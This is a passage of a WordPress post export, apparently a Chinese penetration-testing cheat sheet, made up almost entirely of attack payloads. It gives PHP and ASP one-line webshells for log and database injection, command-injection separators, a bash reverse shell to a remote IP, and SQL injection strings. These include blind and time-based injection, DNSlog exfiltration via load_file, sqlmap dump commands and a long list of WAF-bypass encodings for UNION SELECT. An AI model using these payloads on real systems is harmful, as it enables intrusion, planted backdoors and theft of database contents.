class=\"wp-block-heading\"><strong>\u65e5\u5fd7\u6ce8\u5165\uff1a<\/strong><\/h2>\n\n\n\n<p>\u65e5\u5fd7\u8def\u5f84\uff1a\/var\/log\/nginx\/access.log<\/p>\n\n\n\n<p>\u6ce8\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php @eval($_POST&#91;'a']);?&gt;\n&lt;?php assert($_POST&#91;g]);?&gt;\nphpinfo();\n\u4f46g=system('xxx');\u5374\u4e0d\u80fd\u6267\u884c\uff08\u6ca1\u6709disable_functions\uff09<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>RCE\u547d\u4ee4\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>| \u76f4\u63a5\u6267\u884c\u540e\u9762\u7684\u8bed\u53e5\n\n\u4f8b\u5982\uff1aping 127.0.0.1|whoami\n\n||\u5982\u679c\u524d\u9762\u6267\u884c\u7684\u8bed\u53e5\u51fa\u9519\uff0c\u5219\u6267\u884c\u540e\u9762\u7684\u8bed\u53e5\uff0c\n\n\u4f8b\u5982\uff1aping 127.0.0.1||whoami\n\n&amp;\u4e0a\u4e00\u4e2a\u8bed\u53e5\u6267\u884c\u7ed3\u675f\u6267\u884c\u4e0b\u4e00\u4e2a\u8bed\u53e5\uff0c\u65e0\u8bba\u6709\u6ca1\u6709\u9519\u8bef\n\n\u4f8b\u5982\uff1aping 127.0.0.1&amp;whoami\n\n&amp;&amp;\u4e0a\u4e00\u4e2a\u8bed\u53e5\u6267\u884c\u7ed3\u675f\u6267\u884c\u4e0b\u4e00\u4e2a\u8bed\u53e5\uff0c\u5982\u679c\u4e0a\u4e00\u4e2a\u6307\u4ee4\u51fa\u9519\uff0c\u5219\u4e0d\u6267\u884c\u4e0b\u4e00\u4e2a\u6307\u4ee4<\/strong><\/code><\/pre>\n\n\n\n<p>eval()\u547d\u4ee4\u6267\u884c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php\nhighlight_file(__FILE__);       \n$arg = $_REQUEST&#91;'value'];\neval($arg);\n?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d\uff0cvalue\u4e3a\u8f93\u5165\u53c2\u6570<\/p>\n\n\n\n<p>\u53ef\u8c03\u7528php\u7684\u51fd\u6570\uff0c\u4f8b\u5982phpinfo();<\/p>\n\n\n\n<p>system(&#8220;whoami&#8221;);<\/p>\n\n\n\n<p>\u51fd\u6570\u5fc5\u987b\u5e26\u6709\u5206\u53f7\uff0c\u4e0d\u5982\u4f1a\u62a5\u9519<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>\u53cd\u5f39shell\uff0c\u67e5\u8be2\u7b49\u547d\u4ee4\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>NC\u53cd\u5f39shell\uff1a\nnc -lvvp \u7aef\u53e3  \nbash -i&gt;&amp; \/dev\/tcp\/ip\/\u7aef\u53e3 0&gt;&amp;1 \uff08\u53ef\u4ee5\u7528base64\u7f16\u7801\u7ed5\u8fc7\uff09\n\n\u6b63\u5411\uff1a\nnc -lvvp \u7aef\u53e3 -e \/bin\/bash\n\n\u653b\u51fb\uff1anc ip \u7aef\u53e3\n\ncurl\uff0cwhois\uff0cpython\uff0cphp\uff0cruby\uff0csocat\n\n\n\nfind\uff1a-name\u6839\u636e\u6587\u4ef6\u540d\u7cbe\u786e\u67e5\u627e\uff0c*\u7c97\u7565\u67e5\u627e\uff0c\uff1f\u5355\u4e2a\u4efb\u610f\u5b57\u7b26\n\n-atime +\u5929\u6570   -amin +\u5206\u949f -mtime\u4fee\u6539\u65f6\u95f4<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SQL\u90e8\u5206\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u6570\u5b57\u578b:\n\n?id=1 or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u5b57\u7b26\u578b:\n\n?name=ab' or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u641c\u7d22\u578b\uff1a'%\u5173\u952e\u5b57%'\n\n?name=abc%' or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>xx\u578b\uff1a\n\n?name=123') and 1=1#\n\ninsert\/update\u578b\uff1a\uff08\u6ce8\u610f\u8868\u5355\u957f\u5ea6\uff09\n\nusename=123','456','789',SQL\u8bed\u53e5)#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u5e03\u5c14\u76f2\u6ce8\uff1a\n\n\uff1fid=1' and (length(database()))&gt;7#\n\n? id=1' and ascii(substr(database(),1,1))&gt;100#\n\nsubstr((),1,1)\u7b2c\u4e00\u4e2a1\u6307\u7684\u662f\u4ece\u7b2c\u4e00\u4e2a\u5b57\u7b26\u5f00\u59cb\uff0c\u7b2c\u4e8c\u4e2a1\u6307\u7684\u6240\u9009\u53d6\u7684\u957f\u5ea6<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u65f6\u95f4\u76f2\u6ce8\uff1a\n\n?name=abc' and sleep(5)#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>## \u5bbd\u5b57\u8282\u76f2\u6ce8\uff1a\n\n?name=abc %df' and 1=1#\n\n(\u56de\u663e\u6ce8\u5165\u9700\u8981\u6ce8\u610f\u957f\u5ea6\uff0c\u4e14\u6709\u65f6\u5019\u53ea\u80fd\u5728burp\u4e2d\u5b9e\u73b0)<\/strong><\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>DNSlog\u6ce8\u5165\uff1a<\/strong><\/h3>\n\n\n\n<p>\u5229\u7528loadfile\u51fd\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>and (select load_file(concat('\/\/',(select database()),'.6.eudspa.dnslog.cn\/a')))--+\n\nand (select load_file(concat('\\\\\\\\',(select database()),'.d7d27f.dnslog.cn\\\\xxx.txt')))<\/strong><\/code><\/pre>\n\n\n\n<p><strong>\u51fd\u6570\u6761\u4ef6\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>load_file()\n\u8bfb\u5199\u6743\u9650\nwindows\uff08UNC\u8def\u5f84\uff09\n\nand (select count(*) from mysql.user)&gt;0 \/*\u5982\u679c\u7ed3\u679c\u8fd4\u56de\u6b63\u5e38\uff0c\u8bf4\u660e\u5177\u6709\u8bfb\u5199\u6743\u9650.*\/\nand (select count(*) from mysql.user)&gt;0 \/*\u8fd4\u56de\u9519\u8bef\uff0c\u5e94\u8be5\u662f\u7ba1\u7406\u5458\u7ed9\u6570\u636e\u5e93\u8d26\u6237\u964d\u6743\u4e86*\/<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SQLmap\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>-u \"URL\"\n\n-l \u6587\u4ef6\u540d.txt\n\n--dbs \u6570\u636e\u5e93 -D \u6570\u636e\u5e93\u540d\n\n--tables \u8868 -T \u8868\u540d\n\n-columns \u5217 -C \u5217\u540d\n\n--dump \u83b7\u53d6\u5e76\u8f93\u51fa\u5217\u5185\u5bb9\n\n--batch \u81ea\u52a8\u5316\u9009\u9879\uff0c\u7528\u4e8e\u9ed8\u8ba4\u6267\u884c\u6240\u6709\u64cd\u4f5c<\/strong><\/code><\/pre>\n\n\n\n<p><strong>\u624b\u6ce8\uff08hackbar\uff09\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\n\nunion select 1,group_concat(schema_name),3 from information_schema.schemata\n\n\u83b7\u53d6\u6240\u6709\u8868\n\nunion select group_concat(table_name) from information_schema.tables where table_schema=database()\t\tAND table_name=\"\u8868\u540d\"\n\n\u83b7\u53d6\u6240\u6709\u5217\n\nunion select group_concat(column_name) from information_schema.columns where table_schema=database()\t\n\n\u83b7\u53d6\u6307\u5b9a\u6570\u636e\u5e93\u6307\u5b9a\u8868\u7684\u5217\u5185\u5bb9\n\nunion select 1,group_concat(target_column),3 from target_database.target_table\n\nsqlmap\u7a7a\u683c\u7ed5\u8fc7\uff1a\n\npython sqlmap.py --random-agent -l zzz.txt --tamper space2comment -D \u6570\u636e\u5e93\u540d -T \u8868\u540d --dump\n\nmysql\u7a7a\u683c\u7ed5\u8fc7\uff1a\n\n%20 %09 %0a %0b %0c %0d %a0 %00\n\n\/**\/\t\t()<\/strong><\/code><\/pre>\n\n\n\n<p><strong>\u9017\u53f7\u7ed5\u8fc7\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>union select 1,2,3;\n\nunion select * from ((select 1)A join (select 2)B join (select 3)C);<\/strong><\/code><\/pre>\n\n\n\n<p><strong>union select\u7ed5\u8fc7\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\/*!%55NiOn*\/ \/*!%53eLEct*\/\n\n%55nion(%53elect 1,2,3)-- -\n\n+union+distinct+select+\n\n+union+distinctROW+select+\n\n\/**\/\/*!12345UNION SELECT*\/\/**\/\n\n\/**\/\/*!50000UNION SELECT*\/\/**\/\n\n\/**\/UNION\/**\/\/*!50000SELECT*\/\/**\/\n\n\/*!50000UniON SeLeCt*\/\n\nunion \/*!50000%53elect*\/\n\n+#uNiOn+#sEleCt\n\n+#1q%0AuNiOn all#qa%0A#%0AsEleCt\n\n\/*!%55NiOn*\/ \/*!%53eLEct*\/\n\n\/*!u%6eion*\/ \/*!se%6cect*\/\n\n+un\/**\/ion+se\/**\/lect\n\nuni%0bon+se%0blect\n\n%2f**%2funion%2f**%2fselect\n\nunion%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A\n\nREVERSE(noinu)+REVERSE(tceles)\n\n\/*--*\/union\/*--*\/select\/*--*\/\n\nunion (\/*!\/**\/ SeleCT *\/ 1,2,3)\n\n\/*!union*\/+\/*!select*\/\n\nunion+\/*!select*\/\n\n\/**\/union\/**\/select\/**\/\n \n\/**\/uNIon\/**\/sEleCt\/**\/\n\n\/**\/\/*!union*\/\/**\/\/*!select*\/\/**\/\n \n\/*!uNIOn*\/ \/*!SelECt*\/\n\n+union+distinct+select+\n\n+union+distinctROW+select+\n\n+UnIOn%0d%0aSeleCt%0d%0a\n\nUNION\/*&amp;test=1*\/SELECT\/*&amp;pwn=2*\/\n\nun?+un\/**\/ion+se\/**\/lect+\n\n+UNunionION+SEselectLECT+\n\n+uni%0bon+se%0blect+\n\n%252f%252a*\/union%252f%252a \/select%252f%252a*\/\n\n\/%2A%2A\/union\/%2A%2A\/select\/%2A%2A\/\n\n%2f**%2funion%2f**%2fselect%2f**%2f\n\nunion%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A\n\n\/*!UnIoN*\/SeLecT+\n\n 82 ##\n 83 #\n 84 #\n 85 #Union Select by PASS with Url Encoded Method:\n\n%55nion(%53elect)\n\nunion%20distinct%20select\n\nunion%20%64istinctRO%57%20select\n\nunion%2053elect\n\n%23?%0auion%20?%23?%0aselect\n\n%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect\n\n%55nion %53eLEct\n\nu%6eion se%6cect\n\nunio%6e %73elect\n\nunio%6e%20%64istinc%74%20%73elect\n\nuni%6fn distinct%52OW s%65lect\n\n%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u53e5\u8bdd\u6728\u9a6c\uff08\u4e00\u822c\u7528\u51b0\u874e\u6216\u8681\u5251\uff09\uff1a<\/h2>\n\n\n\n<p><strong>asp\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2261\u2529\u613e \t\t\t\u5bc6\u7801a<\/strong>\n\n&lt;%%25Execute(request(\"a\"))%%25> \n&lt;%Execute(request(\"a\"))%> \n%>&lt;%execute request(\"a\")%>&lt;%  \n&lt;script language=VBScript runat=server>execute request(\"a\")&lt;\/script> \n&lt;%25Execute(request(\"a\"))%25> \n%>&lt;%execute request(\"yy\")%> \n&lt;%execute request(char(97))%> \n&lt;%eval request(char(97))%> \n\":execute request(\"value\"):a=\"  \n&lt;script language=VBScript runat=server>if request(chr(35))&lt;>\"\"\"\" then  \nExecuteGlobal request(chr(35)) &lt;\/script> \n\n\u5728\u6570\u636e\u5e93\u91cc\u63d2\u5165\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c  \n\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2223\u2529\u613e  \u5bc6\u7801\u4e3a: a  \n\u52a0\u5bc6\u65b9\u5f0f\u662f:ANSI->Unicode<\/code><\/pre>\n\n\n\n<p><strong>php\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php @eval($_POST&#91;'a']);?&gt;\n&lt;?php assert($_POST&#91;g]);?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6587\u4ef6\u4e0a\u4f20\u7ed5\u8fc7\uff1a .asp\u7ed5\u8fc7\uff1a access\u6570\u636e\u5e93\u5982\u679c\u662fasp\u683c\u5f0f\uff0c\u53ef\u4ee5\u901a\u8fc7\u6570\u636e\u63d2\u5165\u7684\u65b9\u5f0f\u63d2\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u6bd4\u5982 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23","post","type-post","status-publish","format-standard","hentry","category-shentouceshi"],"_links":{"self":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/comments?post=23"}],"version-history":[{"count":10,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23\/revisions"}],"predecessor-version":[{"id":1743,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23\/revisions\/1743"}],"wp:attachment":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/media?parent=23"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/categories?post=23"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/tags?post=23"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}